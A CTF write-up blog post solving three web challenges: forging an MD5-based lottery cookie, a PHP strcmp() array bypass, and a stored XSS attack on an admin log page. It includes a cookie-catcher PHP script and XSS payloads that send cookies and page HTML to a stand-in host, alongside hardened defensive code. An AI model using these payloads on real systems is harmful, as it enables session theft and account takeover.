ENEI CTF 2015 - Writeups


Posted by 0xacb on September 21, 2015 · 4 mins read


1 - Endless Lottery

We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!

The page looks like this:

Welcome to our lottery.

By visiting our page from time to time you get a chance of winning 10.0000 jelly beans!

Winning ticket: 1337500001 your ticket: 1337810218

Better luck next time... :(

The cookie changes on every refresh of the page in a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo looks like a base64-encoded string.

$ echo MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU= | base64 -d
29f2299ca4b26fbf42c23ee47c401125

Now we have something that looks like a hash, 32 hex characters long, which suggests a message digest such as MD5. Let's hash our ticket with MD5 and compare:

$ echo -n 1337810218 | md5

Nice, it matches! So cookie = random_ID:base64(md5(ticket)). Nothing in that cookie depends on a server-side secret, so since our goal is to win the lottery, all we need to do is build the same value for the winning ticket and replace our session cookie with it:

$ echo -n 1337500001 | md5
$ echo -n <md5 output from the previous command> | base64


Ok you win! Flag: 2d0ad06ff8349797176aad77e10edde031ec8c82
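The scheme recovered above, written out as an added PHP example (not the challenge's own code): parsing the id:base64(md5(ticket)) cookie, showing that anyone can mint one for an arbitrary ticket because no secret is involved, and a hardened variant that binds the ticket to the id with an HMAC under a server-side key. The function names and the secret are assumptions; the cookie and ticket values are the ones from the write-up.

```php
<?php
// Added example, not the challenge's own code: the cookie format recovered above,
// id:base64(md5(ticket)), and why it can be forged by anyone who knows the format.
// Function names and the server secret are assumptions; the values are from the write-up.

const ORIGINAL_COOKIE = '706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=';
const MY_TICKET       = '1337810218';
const WINNING_TICKET  = '1337500001';

// Split "id:payload" and strictly base64-decode the payload.
function parse_lotinfo(string $cookie): array
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2) {
        throw new InvalidArgumentException('expected id:payload');
    }
    $digest = base64_decode($parts[1], true);
    if ($digest === false) {
        throw new InvalidArgumentException('payload is not valid base64');
    }
    return ['id' => $parts[0], 'digest' => $digest];
}

// The scheme as reverse-engineered above: an unkeyed MD5 of the ticket. Nothing in
// it depends on a secret, so a client can mint a cookie for any ticket it likes.
function weak_lotinfo(string $id, string $ticket): string
{
    return $id . ':' . base64_encode(md5($ticket));
}

// Hardened variant: the ticket is carried in the clear but bound to the id with an
// HMAC under a key only the server knows, so the client cannot change it.
function signed_lotinfo(string $id, string $ticket, string $secret): string
{
    $tag = hash_hmac('sha256', $id . ':' . $ticket, $secret);
    return $id . ':' . $ticket . ':' . $tag;
}

// Returns the ticket if the tag verifies, null otherwise.
function verify_signed_lotinfo(string $cookie, string $secret): ?string
{
    $parts = explode(':', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$id, $ticket, $tag] = $parts;
    $expected = hash_hmac('sha256', $id . ':' . $ticket, $secret);
    // Constant-time comparison: do not leak how many tag bytes matched.
    return hash_equals($expected, $tag) ? $ticket : null;
}

$info = parse_lotinfo(ORIGINAL_COOKIE);
printf("decoded digest: %s\n", $info['digest']);      // 29f2299ca4b26fbf42c23ee47c401125
printf("md5(my ticket): %s\n", md5(MY_TICKET));
printf("forged cookie:  %s\n", weak_lotinfo($info['id'], WINNING_TICKET));

$secret = 'constructed-server-side-secret';            // placeholder; never hard-code a real key
$good = signed_lotinfo('706', WINNING_TICKET, $secret);
var_dump(verify_signed_lotinfo($good, $secret) === WINNING_TICKET);   // bool(true)
// Swapping the ticket without re-signing is rejected.
$tampered = str_replace(WINNING_TICKET, MY_TICKET, $good);
var_dump(verify_signed_lotinfo($tampered, $secret));                  // NULL
```

Run it with php from the command line. The point of the hardened variant is not the stronger hash but the key: an attacker who knows the exact format of the weak cookie still cannot produce a valid tag without the server secret, and hash_equals() keeps the comparison from leaking timing information.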

2 - Plain Auth

A friend has a service online and he says that he will never get hacked with his new bullet proof authentication mechanism. Can you prove him wrong?

This was the login page (it's not working since I'm not running PHP):

When we submit the form, a new message shows up:

Let's look for a strcmp vulnerability. PHP's strcmp(string $str1, string $str2) returns 0 if $str1 and $str2 are equal. When we pass an array instead of a string in the GET password parameter, strcmp() emits a warning and returns NULL (on PHP 5 and 7), and a loose comparison such as == 0 treats NULL as equal to 0, so the check is bypassed: index.php?password[]

\o/ Flag: 421c88ff643a053d2abf6b56936093a8cc5d5630
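The bypass explained above, side by side with a check that is not fooled by it, as an added PHP example (not the challenge's backend). The placeholder password and the function names are assumptions; parse_str() is used to build the same arrays PHP would put into $_GET for the two query strings.

```php
<?php
// Added example, not the challenge's backend: why ?password[] gets past a strcmp()
// check, and a check that is not fooled. $secret and the function names are assumptions.

$secret = 'constructed-placeholder-password';

// Vulnerable pattern. On PHP 5 and 7, strcmp() with an array argument emits a warning
// and returns NULL, and NULL == 0 is true under loose comparison, so the check passes.
// PHP 8 throws a TypeError instead, which the catch turns into a plain failure.
function vulnerable_check($password, string $secret): bool
{
    try {
        return @strcmp($password, $secret) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened pattern: refuse anything that is not a string, then compare in constant time.
function hardened_check($password, string $secret): bool
{
    if (!is_string($password)) {
        return false;
    }
    return hash_equals($secret, $password);
}

// parse_str() builds the same array PHP puts into $_GET for these query strings.
parse_str('password=guess', $normal);   // ['password' => 'guess']
parse_str('password[]',     $bypass);   // ['password' => ['']]

var_dump(vulnerable_check($normal['password'], $secret));   // bool(false)
var_dump(vulnerable_check($bypass['password'], $secret));   // bool(true) on PHP 5/7
var_dump(hardened_check($bypass['password'],   $secret));   // bool(false)
var_dump(hardened_check($secret,               $secret));   // bool(true)
```

The is_string() guard is what matters: any code path that feeds request parameters into a function expecting strings needs it, because PHP builds arrays from bracketed parameter names before your code ever sees them. Comparing with === instead of == would also close this particular hole, since NULL === 0 is false, but it would not help with the timing side channel that hash_equals() addresses.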

3 - Webhack 3

By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?

This was the login page (it's not working since I'm not running the backend):

When we try to login using a random username and password the following message appears:

"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:

<?php
// catch.php: appends whatever arrives in the data parameter to log.txt
$data = $_GET['data'] ?? '';
$f = fopen("log.txt", "a");
fwrite($f, $data."\n");
fclose($f);

Let's inject a script in the username: <script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>

Suddenly, this hint pops up:

Let's try to get the document HTML: <script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!


<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td></td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td></td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td></td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td></td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>

Rendered, this HTML looks like this:

remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a

IP Address | Username  | Password
           | Xiene1337 | 185de54b5a6fd960f48666edfa41e6c6
           | Xiene1337 | 707d14da58ce62c08bba543fa62fe638
           | Xiene1337 | 74dade10c776b5ab3caf8cedb06860fb
           | script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script> |

If we try to login using the username Xiene1337 and setting document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:

The passwords in the log table are 32 hex characters long, so they are probably MD5 hashes. Let's try to find them in MD5 lookup databases.

MD5 Hash | Original password

The cracked passwords are very similar, so Xiene1337 must have mistyped them. To find the correct one, just look at your keyboard: the correct password is ljbo.

\o/ Flag: 7b88396a68feaa7aa3c388227d749097cfbf99fe
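The two weaknesses that made the admin panel fall in this challenge, as an added PHP example (not the challenge's backend): the log table echoed the submitted username into HTML unescaped, and the admin's token cookie was readable from document.cookie. The sample row, the token value and the function names are constructed for this example; the hardened row uses htmlspecialchars() and the cookie is set with the HttpOnly flag.

```php
<?php
// Added example, not the challenge's backend: how the admin's log table comes to
// execute a username, and the two defensive changes that stop it. The sample entry,
// the token value and the function names are constructed for this example.

// Cookie hardening has to happen before any output. HttpOnly keeps the token out of
// document.cookie, so even an injected script cannot read it.
function set_session_token(string $token): bool
{
    return setcookie('token', $token, [
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}
set_session_token('constructed-token-value');   // no-op on the CLI, sets the header on a web server

// Sample row in the shape of the table recovered above (the IP is a documentation address).
$entry = [
    'ip'       => '203.0.113.10',
    'username' => '<script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>',
    'password' => '185de54b5a6fd960f48666edfa41e6c6',
];

// Vulnerable: user-controlled fields are interpolated straight into HTML, so the
// admin's browser runs whatever was typed into the login form.
function render_row_unsafe(array $e): string
{
    return "<tr><td>{$e['ip']}</td><td>{$e['username']}</td><td>{$e['password']}</td></tr>";
}

// Hardened: every field is HTML-encoded. ENT_QUOTES also encodes quotes, so the same
// helper is safe inside attribute values; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_row_safe(array $e): string
{
    return '<tr><td>' . esc($e['ip']) . '</td><td>' . esc($e['username'])
         . '</td><td>' . esc($e['password']) . '</td></tr>';
}

echo render_row_unsafe($entry), "\n";   // contains a live <script> element
echo render_row_safe($entry), "\n";     // &lt;script&gt;... is displayed as text
```

Run it with php from the command line and compare the two rows. The hardened row still shows the admin exactly what was submitted, which is what a login-attempt log is for; the browser just treats it as text. The HttpOnly cookie is the second layer: it limits the damage if an encoding bug elsewhere in the panel is missed, but it does not replace output encoding, since a script that runs in the admin's session can still act on the page itself.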